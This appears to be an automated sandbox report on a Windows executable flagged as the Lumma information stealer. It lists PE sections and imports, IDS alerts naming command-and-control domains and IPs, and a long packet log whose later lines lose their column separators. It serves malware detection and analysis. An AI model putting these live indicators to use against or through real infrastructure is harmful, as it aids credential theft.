IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1821000 | 0xa00d0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x179b920 | 0xb4 | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9daad8 | 0x9dac00 | dbabdd04486ca7630374f2cd0bd202d5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9dc000 | 0xdbd0e4 | 0xdbd200 | 789856b21de10604dbcbb190e3245398 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x179a000 | 0x85d80 | 0x5b800 | a29aa7d2a30594ad6159cc7cb9a7cf72 | False | 0.3579528475068306 | data | 5.550861256445837 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x1820000 | 0x44c | 0x600 | 20586240f4a34ea40e10be356d683376 | False | 0.359375 | OpenPGP Public Key | 3.94359520810912 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x1821000 | 0xa00d0 | 0xa0200 | 2fee49fb9d042417deae361269e547b9 | False | 0.49216158030835283 | data | 6.707060397996746 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab | 0x18c2000 | 0x4 | 0x200 | 07b5472d347d42780469fb2654b7fc54 | False | 0.02734375 | data | 0.020393135236084953 | IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x18c3000 | 0x1ebc4 | 0x1ec00 | 0f6244de6a2a8a735b2f2763961f94a8 | False | 0.284814850101626 | data | 4.647124921697015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x18c3234 | 0x56ff | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9933096852408962
RT_ICON | 0x18c8934 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 11811 x 11811 px/m | English | United States | 0.0967851650301668
RT_ICON | 0x18d915c | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 11811 x 11811 px/m | English | United States | 0.14584317430325933
RT_ICON | 0x18dd384 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 11811 x 11811 px/m | English | United States | 0.187551867219917
RT_ICON | 0x18df92c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 11811 x 11811 px/m | English | United States | 0.23569418386491559
RT_ICON | 0x18e09d4 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 11811 x 11811 px/m | English | United States | 0.38563829787234044
RT_GROUP_ICON | 0x18e0e3c | 0x5a | data | English | United States | 0.7666666666666667
RT_VERSION | 0x18e0e98 | 0x584 | data | English | United States | 0.25708215297450426
RT_MANIFEST | 0x18e141c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
DLL | Import
kernel32.dll | WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-13T01:43:19.559555+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49763 | 188.114.97.3 | 443 | TCP
2024-10-13T01:43:19.559555+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49763 | 188.114.97.3 | 443 | TCP
2024-10-13T01:43:19.566415+0200 | 2056570 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) | 1 | 192.168.2.6 | 65205 | 1.1.1.1 | 53 | UDP
2024-10-13T01:43:20.068526+0200 | 2056571 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI) | 1 | 192.168.2.6 | 49774 | 188.114.97.3 | 443 | TCP
2024-10-13T01:43:20.532951+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49774 | 188.114.97.3 | 443 | TCP
2024-10-13T01:43:20.532951+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49774 | 188.114.97.3 | 443 | TCP
2024-10-13T01:43:20.535905+0200 | 2056568 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) | 1 | 192.168.2.6 | 56776 | 1.1.1.1 | 53 | UDP
2024-10-13T01:43:20.583271+0200 | 2056566 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) | 1 | 192.168.2.6 | 55186 | 1.1.1.1 | 53 | UDP
2024-10-13T01:43:21.104176+0200 | 2056567 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI) | 1 | 192.168.2.6 | 49780 | 104.21.33.249 | 443 | TCP
2024-10-13T01:43:21.763103+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49780 | 104.21.33.249 | 443 | TCP
2024-10-13T01:43:21.763103+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49780 | 104.21.33.249 | 443 | TCP
2024-10-13T01:43:21.793998+0200 | 2056564 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) | 1 | 192.168.2.6 | 63346 | 1.1.1.1 | 53 | UDP
2024-10-13T01:43:22.294217+0200 | 2056565 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI) | 1 | 192.168.2.6 | 49790 | 104.21.77.78 | 443 | TCP
2024-10-13T01:43:22.729015+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49790 | 104.21.77.78 | 443 | TCP
2024-10-13T01:43:22.729015+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49790 | 104.21.77.78 | 443 | TCP
2024-10-13T01:43:22.766633+0200 | 2056562 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) | 1 | 192.168.2.6 | 52725 | 1.1.1.1 | 53 | UDP
2024-10-13T01:43:23.264268+0200 | 2056563 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI) | 1 | 192.168.2.6 | 49799 | 172.67.140.193 | 443 | TCP
2024-10-13T01:43:23.697513+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49799 | 172.67.140.193 | 443 | TCP
2024-10-13T01:43:23.697513+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49799 | 172.67.140.193 | 443 | TCP
2024-10-13T01:43:23.699707+0200 | 2056560 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) | 1 | 192.168.2.6 | 63862 | 1.1.1.1 | 53 | UDP
2024-10-13T01:43:24.244298+0200 | 2056561 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI) | 1 | 192.168.2.6 | 49806 | 172.67.173.224 | 443 | TCP
2024-10-13T01:43:24.691670+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49806 | 172.67.173.224 | 443 | TCP
2024-10-13T01:43:24.691670+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49806 | 172.67.173.224 | 443 | TCP
2024-10-13T01:43:24.703292+0200 | 2056558 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) | 1 | 192.168.2.6 | 54019 | 1.1.1.1 | 53 | UDP
2024-10-13T01:43:25.212994+0200 | 2056559 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI) | 1 | 192.168.2.6 | 49813 | 104.21.79.35 | 443 | TCP
2024-10-13T01:43:25.704366+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49813 | 104.21.79.35 | 443 | TCP
2024-10-13T01:43:25.704366+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49813 | 104.21.79.35 | 443 | TCP
2024-10-13T01:43:25.707038+0200 | 2056556 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) | 1 | 192.168.2.6 | 54466 | 1.1.1.1 | 53 | UDP
2024-10-13T01:43:26.203356+0200 | 2056557 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI) | 1 | 192.168.2.6 | 49819 | 188.114.96.3 | 443 | TCP
2024-10-13T01:43:27.364361+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49819 | 188.114.96.3 | 443 | TCP
2024-10-13T01:43:27.364361+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49819 | 188.114.96.3 | 443 | TCP
2024-10-13T01:43:28.675668+0200 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.6 | 49826 | 104.102.49.254 | 443 | TCP
2024-10-13T01:43:29.470690+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49837 | 172.67.206.204 | 443 | TCP
2024-10-13T01:43:29.470690+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49837 | 172.67.206.204 | 443 | TCP
2024-10-13T01:43:30.773465+0200 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.6 | 49843 | 172.67.206.204 | 443 | TCP
2024-10-13T01:43:30.773465+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49843 | 172.67.206.204 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2024 01:43:18.543746948 CEST | 49763 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:18.543791056 CEST | 443 | 49763 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:18.543872118 CEST | 49763 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:18.547744989 CEST | 49763 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:18.547759056 CEST | 443 | 49763 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:19.054076910 CEST | 443 | 49763 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:19.054286003 CEST | 49763 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:19.055690050 CEST | 49763 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:19.055721045 CEST | 443 | 49763 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:19.056061029 CEST | 443 | 49763 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:19.096606016 CEST | 49763 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:19.100908995 CEST | 49763 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:19.100945950 CEST | 49763 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:19.101094961 CEST | 443 | 49763 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:19.559716940 CEST | 443 | 49763 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:19.559948921 CEST | 443 | 49763 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:19.560023069 CEST | 49763 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:19.561994076 CEST | 49763 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:19.562021971 CEST | 443 | 49763 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:19.562046051 CEST | 49763 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:19.562060118 CEST | 443 | 49763 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:19.581954956 CEST | 49774 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:19.581984043 CEST | 443 | 49774 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:19.583436012 CEST | 49774 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:19.583472967 CEST | 49774 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:19.583479881 CEST | 443 | 49774 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:20.068404913 CEST | 443 | 49774 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:20.068526030 CEST | 49774 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:20.070173025 CEST | 49774 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:20.070178986 CEST | 443 | 49774 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:20.070689917 CEST | 443 | 49774 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:20.071986914 CEST | 49774 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:20.071986914 CEST | 49774 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:20.072122097 CEST | 443 | 49774 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:20.533102989 CEST | 443 | 49774 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:20.533345938 CEST | 443 | 49774 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:20.533468962 CEST | 49774 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:20.533523083 CEST | 49774 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:20.533523083 CEST | 49774 | 443 | 192.168.2.6 | 188.114.97.3
Oct 13, 2024 01:43:20.533550024 CEST | 443 | 49774 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:20.533562899 CEST | 443 | 49774 | 188.114.97.3 | 192.168.2.6
Oct 13, 2024 01:43:20.596239090 CEST | 49780 | 443 | 192.168.2.6 | 104.21.33.249
Oct 13, 2024 01:43:20.596369982 CEST | 443 | 49780 | 104.21.33.249 | 192.168.2.6
Oct 13, 2024 01:43:20.596462965 CEST | 49780 | 443 | 192.168.2.6 | 104.21.33.249
Oct 13, 2024 01:43:20.597135067 CEST | 49780 | 443 | 192.168.2.6 | 104.21.33.249
Oct 13, 2024 01:43:20.597157955 CEST | 443 | 49780 | 104.21.33.249 | 192.168.2.6
Oct 13, 2024 01:43:21.104089975 CEST | 443 | 49780 | 104.21.33.249 | 192.168.2.6
Oct 13, 2024 01:43:21.104176044 CEST | 49780 | 443 | 192.168.2.6 | 104.21.33.249
Oct 13, 2024 01:43:21.275130033 CEST | 49780 | 443 | 192.168.2.6 | 104.21.33.249
Oct 13, 2024 01:43:21.275185108 CEST | 443 | 49780 | 104.21.33.249 | 192.168.2.6
Oct 13, 2024 01:43:21.276247025 CEST | 443 | 49780 | 104.21.33.249 | 192.168.2.6
Oct 13, 2024 01:43:21.278038979 CEST | 49780 | 443 | 192.168.2.6 | 104.21.33.249
Oct 13, 2024 01:43:21.278109074 CEST | 49780 | 443 | 192.168.2.6 | 104.21.33.249
Oct 13, 2024 01:43:21.278307915 CEST | 443 | 49780 | 104.21.33.249 | 192.168.2.6
Oct 13, 2024 01:43:21.763077974 CEST | 443 | 49780 | 104.21.33.249 | 192.168.2.6
Oct 13, 2024 01:43:21.763189077 CEST | 443 | 49780 | 104.21.33.249 | 192.168.2.6
Oct 13, 2024 01:43:21.763246059 CEST | 49780 | 443 | 192.168.2.6 | 104.21.33.249
Oct 13, 2024 01:43:21.763377905 CEST | 49780 | 443 | 192.168.2.6 | 104.21.33.249
Oct 13, 2024 01:43:21.763400078 CEST | 443 | 49780 | 104.21.33.249 | 192.168.2.6
Oct 13, 2024 01:43:21.763416052 CEST | 49780 | 443 | 192.168.2.6 | 104.21.33.249
Oct 13, 2024 01:43:21.763422966 CEST | 443 | 49780 | 104.21.33.249 | 192.168.2.6
Oct 13, 2024 01:43:21.804024935 CEST | 49790 | 443 | 192.168.2.6 | 104.21.77.78
Oct 13, 2024 01:43:21.804059982 CEST | 443 | 49790 | 104.21.77.78 | 192.168.2.6
Oct 13, 2024 01:43:21.804119110 CEST | 49790 | 443 | 192.168.2.6 | 104.21.77.78
Oct 13, 2024 01:43:21.804932117 CEST | 49790 | 443 | 192.168.2.6 | 104.21.77.78
Oct 13, 2024 01:43:21.804950953 CEST | 443 | 49790 | 104.21.77.78 | 192.168.2.6
Oct 13, 2024 01:43:22.294080973 CEST | 443 | 49790 | 104.21.77.78 | 192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:22.294217110 CEST49790443192.168.2.6104.21.77.78
                                                                                                                                                        Oct 13, 2024 01:43:22.295711040 CEST49790443192.168.2.6104.21.77.78
                                                                                                                                                        Oct 13, 2024 01:43:22.295720100 CEST44349790104.21.77.78192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:22.296103001 CEST44349790104.21.77.78192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:22.297415972 CEST49790443192.168.2.6104.21.77.78
                                                                                                                                                        Oct 13, 2024 01:43:22.297549009 CEST49790443192.168.2.6104.21.77.78
                                                                                                                                                        Oct 13, 2024 01:43:22.297580004 CEST44349790104.21.77.78192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:22.728899002 CEST44349790104.21.77.78192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:22.729068041 CEST44349790104.21.77.78192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:22.729218006 CEST49790443192.168.2.6104.21.77.78
                                                                                                                                                        Oct 13, 2024 01:43:22.729496956 CEST49790443192.168.2.6104.21.77.78
                                                                                                                                                        Oct 13, 2024 01:43:22.729512930 CEST44349790104.21.77.78192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:22.779928923 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:22.780009031 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:22.780141115 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:22.780574083 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:22.780610085 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.264194012 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.264267921 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:23.267946005 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:23.267956018 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.268347025 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.278661013 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:23.278687000 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:23.278825998 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.697592974 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.697810888 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.697943926 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:23.698051929 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:23.698103905 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.698131084 CEST49799443192.168.2.6172.67.140.193
                                                                                                                                                        Oct 13, 2024 01:43:23.698147058 CEST44349799172.67.140.193192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.717125893 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:23.717226982 CEST44349806172.67.173.224192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:23.717334032 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:23.753307104 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:23.753329992 CEST44349806172.67.173.224192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.244060993 CEST44349806172.67.173.224192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.244297981 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:24.249058008 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:24.249090910 CEST44349806172.67.173.224192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.249528885 CEST44349806172.67.173.224192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.265197992 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:24.265281916 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:24.265379906 CEST44349806172.67.173.224192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.691692114 CEST44349806172.67.173.224192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.691880941 CEST44349806172.67.173.224192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.692090988 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:24.692091942 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:24.692192078 CEST49806443192.168.2.6172.67.173.224
                                                                                                                                                        Oct 13, 2024 01:43:24.692241907 CEST44349806172.67.173.224192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.715364933 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:24.715460062 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:24.715543032 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:24.715856075 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:24.715884924 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.212927103 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.212994099 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:25.214349985 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:25.214365005 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.214773893 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.215976000 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:25.216011047 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:25.216048002 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.704351902 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.704571962 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.704657078 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:25.704893112 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:25.704938889 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.704966068 CEST49813443192.168.2.6104.21.79.35
                                                                                                                                                        Oct 13, 2024 01:43:25.704981089 CEST44349813104.21.79.35192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.721163034 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:25.721256018 CEST44349819188.114.96.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:25.721364021 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:25.722533941 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:25.722569942 CEST44349819188.114.96.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:26.203128099 CEST44349819188.114.96.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:26.203356028 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:26.205185890 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:26.205216885 CEST44349819188.114.96.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:26.205488920 CEST44349819188.114.96.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:26.207139015 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:26.207181931 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:26.207223892 CEST44349819188.114.96.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:27.364264965 CEST44349819188.114.96.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:27.364458084 CEST44349819188.114.96.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:27.364665031 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:27.364665031 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:27.364665031 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:27.376760006 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:27.376806021 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:27.376933098 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:27.377275944 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:27.377295971 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:27.596733093 CEST49819443192.168.2.6188.114.96.3
                                                                                                                                                        Oct 13, 2024 01:43:27.596797943 CEST44349819188.114.96.3192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.102263927 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.102339029 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.104480028 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.104496002 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.104747057 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.106030941 CEST49826443192.168.2.6104.102.49.254
                                                                                                                                                        Oct 13, 2024 01:43:28.147433043 CEST44349826104.102.49.254192.168.2.6
                                                                                                                                                        Oct 13, 2024 01:43:28.675801992 CEST44349826104.102.49.254192.168.2.6
